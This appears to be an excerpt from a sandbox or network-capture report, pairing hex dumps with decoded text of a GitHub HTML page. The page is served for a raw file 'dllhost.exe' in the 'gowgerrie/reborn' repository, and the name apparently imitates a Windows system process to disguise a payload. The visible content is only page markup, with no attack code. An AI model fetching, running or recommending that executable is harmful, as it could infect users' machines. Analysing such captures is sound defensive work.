                                                                                              2022-08-10 04:48:03 UTC563INData Raw: 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 2d 36 33 64 65 62 65 2d 34 61 32 66 33 37 66 37 34 31 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 49 57 33 4a 73 65 4f 30 6d 30 79 63 6c 69 78 73 78 44 77 75 58 42 6c 41 70 30 2b 62 58 56 5a 6b 41
                                                                                              Data Ascii: vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-4a2f37f7419e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-IW3JseO0m0yclixsxDwuXBlAp0+bXVZkA
                                                                                              2022-08-10 04:48:03 UTC563INData Raw: 38 41 42 34 0d 0a 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 69 6e 70 75 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 69 6e 70 2d 63 37 65 39 65 64 2d 32 31 36 64 63 39 62 31 65 33 62 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 4f 4d 4e 71 57 58 47 45 48 77 73 30 62 4f 56 6d 44 6d 39
                                                                                              Data Ascii: 8AB4/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-c7e9ed-216dc9b1e3b4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-OMNqWXGEHws0bOVmDm9
                                                                                              2022-08-10 04:48:03 UTC564INData Raw: 35 50 45 30 4f 68 6b 72 5a 72 37 73 42 41 44 67 67 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 31 34 36 34 35 37 32 33 31 35 32 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 38 36 79 41 33 74 71 6c 59 35 6b 47 65 65 32 37 6e 50 77 4d 45 78 51 64 47 54 48 6e 52 4e 4e 49 46 42 49 64 5a 54 51 35 31 69 62 6a 72 39 7a 31 7a 72 6c 4b 32
                                                                                              Data Ascii: 5PE0OhkrZr7sBADgg==" src="https://github.githubassets.com/assets/github-elements-146457231523.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-86yA3tqlY5kGee27nPwMExQdGTHnRNNIFBIdZTQ51ibjr9z1zrlK2
                                                                                              2022-08-10 04:48:03 UTC566INData Raw: 33 62 33 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 56 34 2b 4b 31 32 61 6d 33 4f 58 43 4f 51 59 65 67 48 6f 41 46 48 52 33 59 34 5a 79 39 75 39 37 2b 67 52 35 61 4c 4f 54 56 69 61 33 74 54 65 4e 50 65 33 39 46 6c 4b 6e 76 6e 77 6a 6e 64 65 75 45 4f 57 66 6b 7a 58 4b 42 32 69 4c 32 55 77 4f 4b 4f 5a 4d 2b 67 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d
                                                                                              Data Ascii: 3b34.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-V4+K12am3OXCOQYegHoAFHR3Y4Zy9u97+gR5aLOTVia3tTeNPe39FlKnvnwjndeuEOWfkzXKB2iL2UwOKOZM+g==" src="https://github.githubassets.com/assets/vendors-
                                                                                              2022-08-10 04:48:03 UTC567INData Raw: 34 64 37 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 73 46 66 79 51 6a 71 31 4f 62 46 6b 66 47 30 6c 2b 7a 39 48 7a 7a 6f 53 69 63 56 37 44 6e 58 36 61 64 74 62 68 6d 77 6b 63 77 61 70 45 49 5a 6b 4a 65 66 31 4f 57 51 6c 33 63 59 4b 31 34 75 52 6a 2f 44 5a 63 4d 42 54 66 39 36 33 30 45 39 78 49 79 78 44 65 41 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65
                                                                                              Data Ascii: 4d73.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-sFfyQjq1ObFkfG0l+z9HzzoSicV7DnX6adtbhmwkcwapEIZkJef1OWQl3cYK14uRj/DZcMBTf9630E9xIyxDeA==" src="https://github.githubassets.com/assets/app_asse
                                                                                              2022-08-10 04:48:03 UTC568INData Raw: 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 68 4d 64 42 43 2b 56 6f 4f 49 31 4b 6f 61 72 7a 46 6f 56 7a 72 67 69 62 76 52 67 6a 76 4a 65 44 59 7a 46 71 4d 57 76 64 4f 78 34 68 48 6f 2f 76 44 69 38 64 67 72 54 4f 31 6a 35 39 4c 44 65 63 77 4d 78 57 6c 55 6b 69 58 34 31 58 4b 76 4e 68 41 48 70 50 6e 41 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e
                                                                                              Data Ascii: n="anonymous" defer="defer" type="application/javascript" integrity="sha512-hMdBC+VoOI1KoarzFoVzrgibvRgjvJeDYzFqMWvdOx4hHo/vDi8dgrTO1j59LDecwMxWlUkiX41XKvNhAHpPnA==" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_in
                                                                                              2022-08-10 04:48:03 UTC570INData Raw: 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0a 20 20 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 73 65 6c 65 63 74 65 64 2d 6c 69 6e 6b 22 20 76 61 6c 75 65 3d 22 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 63 31 6b 75 44 2d 4b 32 48 49 56 46 36 33 35 6c 79 70 63 73 57 50 6f 44 34 6b 69 6c 6f 35 2d 6a 41 5f 77 42 46 79 54 34 75 4d 59 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63
                                                                                              Data Ascii: transient="true" /> <meta name="selected-link" value="/gowgerrie/reborn/raw/main/04/dllhost.exe" data-pjax-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verific
                                                                                              2022-08-10 04:48:03 UTC571INData Raw: 42 75 69 6c 64 20 73 6f 66 74 77 61 72 65 20 62 65 74 74 65 72 2c 20 74 6f 67 65 74 68 65 72 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 69 74 48 75 62 20 69 73 20 77 68 65 72 65 20 70 65 6f 70 6c 65 20 62 75 69 6c 64 20 73 6f 66 74 77 61 72 65 2e 20 4d 6f 72 65 20 74 68 61 6e 20 38 33 20 6d 69 6c 6c 69 6f 6e 20 70 65 6f 70 6c 65 20 75 73 65 20 47 69 74 48 75 62 20 74 6f 20 64 69 73 63 6f 76 65 72 2c 20 66 6f 72 6b 2c 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 65 20 74 6f 20 6f 76 65 72 20 32 30 30 20 6d 69 6c 6c 69 6f 6e 20 70 72 6f 6a 65 63 74 73 2e 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65
                                                                                              Data Ascii: Build software better, together"> <meta property="og:description" content="GitHub is where people build software. More than 83 million people use GitHub to discover, fork, and contribute to over 200 million projects."> <meta property="og:image
                                                                                              2022-08-10 04:48:03 UTC572INData Raw: 69 6d 61 67 65 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 69 74 48 75 62 20 69 73 20 77 68 65 72 65 20 70 65 6f 70 6c 65 20 62 75 69 6c 64 20 73 6f 66 74 77 61 72 65 2e 20 4d 6f 72 65 20 74 68 61 6e 20 38 33 20 6d 69 6c 6c 69 6f 6e 20 70 65 6f 70 6c 65 20 75 73 65 20 47 69 74 48 75 62 20 74 6f 20 64 69 73 63 6f 76 65 72 2c 20 66 6f 72 6b 2c 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 65 20 74 6f 20 6f 76 65 72 20 32 30 30 20 6d 69 6c 6c 69 6f 6e 20 70 72 6f 6a 65 63 74 73
                                                                                              Data Ascii: image"> <meta property="twitter:title" content="GitHub"> <meta property="twitter:description" content="GitHub is where people build software. More than 83 million people use GitHub to discover, fork, and contribute to over 200 million projects
                                                                                              2022-08-10 04:48:03 UTC574INData Raw: 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 70 72 65 76 69 65 77 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74 3d 22 22 3e 0a 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 54 69 5a 62 30 59 66 64 4d 76 49 52 73 44 62 58 4c 34 38 65 36 71 4d 71 42 47 77 5a 69 4c 70 42 43 4c 2f 45 30 72 4e 51 61 61 66 37 4e 73 4e 2f 38 65 48 47 50 33 30 44 49 54 70 73 72 43 39 61 64 36 67 48 66 6d 69 61 6e 78 54 62 44 69 7a 38 51 54 4b 75 70 41 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74
                                                                                              Data Ascii: ol" content="no-preview" data-pjax-transient=""> <link crossorigin="anonymous" media="all" integrity="sha512-TiZb0YfdMvIRsDbXL48e6qMqBGwZiLpBCL/E0rNQaaf7NsN/8eHGP30DITpsrC9ad6gHfmianxTbDiz8QTKupA==" rel="stylesheet" href="https://github.githubasset
                                                                                              2022-08-10 04:48:03 UTC575INData Raw: 63 72 6f 73 73 4f 72 69 67 69 6e 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 3e 0a 0a 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6c 6f 67 67 65 64 2d 6f 75 74 20 65 6e 76 2d 70 72 6f 64 75 63 74 69 6f 6e 20 70 61 67 65 2d 72 65 73 70 6f 6e 73 69 76 65 20 6d 69 6e 2d 68 65 69 67 68 74 2d 66 75 6c 6c 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 22 20 73 74 79 6c 65 3d 22 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 22 3e 0a 20 20 20 20 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 6a 73 2d 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 20 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 73 74 61 72 74 2d 6f 66 2d 63
                                                                                              Data Ascii: crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive min-height-full d-flex flex-column" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> <a href="#start-of-c
                                                                                              2022-08-10 04:48:03 UTC576INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 20 44 65 74 61 69 6c 73 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 34 20 70 79 2d 32 22 20 72 6f 6c 65 3d 22 62 61 6e 6e 65 72 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 6c 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 72 65 73 70 6f 6e 73 69 76 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6d 72 2d 34 20 63 6f 6c 6f 72 2d 66 67 2d 69 6e 68 65 72 69 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e
                                                                                              Data Ascii: -container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <a class="mr-4 color-fg-inherit" href="https://github.
                                                                                              2022-08-10 04:48:03 UTC578INData Raw: 72 65 66 5f 70 61 67 65 3d 25 32 46 67 6f 77 67 65 72 72 69 65 25 32 46 72 65 62 6f 72 6e 25 32 46 72 61 77 25 32 46 6d 61 69 6e 25 32 46 30 34 25 32 46 64 6c 6c 68 6f 73 74 2e 65 78 65 26 61 6d 70 3b 73 6f 75 72 63 65 3d 68 65 61 64 65 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 6e 6f 6e 65 20 66 35 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 62 6f 72 64 65 72 20 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 64 65 66 61 75 6c 74 20 72 6f 75 6e 64 65 64 2d 32 20 70 78 2d 32 20 70 79 2d 31 20 6d 72 2d 33 20 6d 72 2d 73 6d 2d 35 20 63 6f 6c 6f 72 2d 66 67 2d 69 6e 68 65 72 69 74 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22
                                                                                              Data Ascii: ref_page=%2Fgowgerrie%2Freborn%2Fraw%2Fmain%2F04%2Fdllhost.exe&amp;source=header" class="d-inline-block d-lg-none f5 no-underline border color-border-default rounded-2 px-2 py-1 mr-3 mr-sm-5 color-fg-inherit" data-hydro-click="
                                                                                              2022-08-10 04:48:03 UTC579INData Raw: 72 4d 65 6e 75 2d 2d 6c 6f 67 67 65 64 2d 6f 75 74 20 70 6f 73 69 74 69 6f 6e 2d 66 69 78 65 64 20 74 6f 70 2d 30 20 72 69 67 68 74 2d 30 20 62 6f 74 74 6f 6d 2d 30 20 68 65 69 67 68 74 2d 66 69 74 20 70 6f 73 69 74 69 6f 6e 2d 6c 67 2d 72 65 6c 61 74 69 76 65 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 66 6c 65 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 64 2d 6c 67 2d 6e 6f 6e 65 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 65 6e 64 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20
                                                                                              Data Ascii: rMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button
                                                                                              2022-08-10 04:48:03 UTC580INData Raw: 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 63 68 65 76 6f 6e 2d 64 6f 77 6e 2d 6d 6b 74 67 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 70 6f 73 69 74 69 6f 6e 2d 6c 67 2d 72 65 6c 61 74 69 76 65 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 2c 31 6c 36 2e 32 2c 36 4c 31 33 2c 31 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 73 75 6d 6d 61 72 79 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 66 6c 65 78 2d 61 75 74 6f 20 72 6f 75 6e 64 65 64 20 70 78 2d 30 20 6d 74 2d 30 20 70 62 2d 34 20 70 2d 6c 67 2d 34 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 6f 73 69 74 69
                                                                                              Data Ascii: xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"><path d="M1,1l6.2,6L13,1"></path></svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative positi
                                                                                              2022-08-10 04:48:03 UTC582INData Raw: 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 41 63 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 41 63 74 69 6f 6e 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 41 63 74 69 6f 6e 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63
                                                                                              Data Ascii: on&quot;:&quot;click to go to Actions&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Actions;&quot;}" href="/features/actions"> Actions</a> </li> <li> <a class="lh-condensed-ultra d-bloc
                                                                                              2022-08-10 04:48:03 UTC583INData Raw: 65 78 65 3b 72 65 66 5f 63 74 61 3a 50 61 63 6b 61 67 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 70 61 63 6b 61 67 65 73 22 3e 0a 20 20 20 20 20 20 50 61 63 6b 61 67 65 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20
                                                                                              Data Ascii: exe;ref_cta:Packages;&quot;}" href="/features/packages"> Packages</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header
                                                                                              2022-08-10 04:48:03 UTC584INData Raw: 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 44 69 73 63 75 73 73 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b
                                                                                              Data Ascii: lass="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to Discussions&quot;,&quot;label&quot;
                                                                                              2022-08-10 04:48:03 UTC586INData Raw: 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 62 6f 6c 64 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 75 73 74 6f 6d 65 72 20 73 74 6f 72 69 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f
                                                                                              Data Ascii: osition-relative Link--primary text-bold py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to Customer stories&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/
                                                                                              2022-08-10 04:48:03 UTC587INData Raw: 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 64 6c 6c 68 6f 73 74 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 45 6e 74 65 72 70 72 69 73 65 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 65 6e 74 65 72 70 72 69 73 65 22 3e 45 6e 74 65 72 70 72 69 73 65 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 30 20 6d 72 2d 6c 67 2d 33 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20
                                                                                              Data Ascii: &quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/dllhost.exe;ref_cta:Enterprise;&quot;}" href="/enterprise">Enterprise</a></li> <li class="mr-0 mr-lg-3 position-relative flex-wrap flex-justify-between flex-items-center
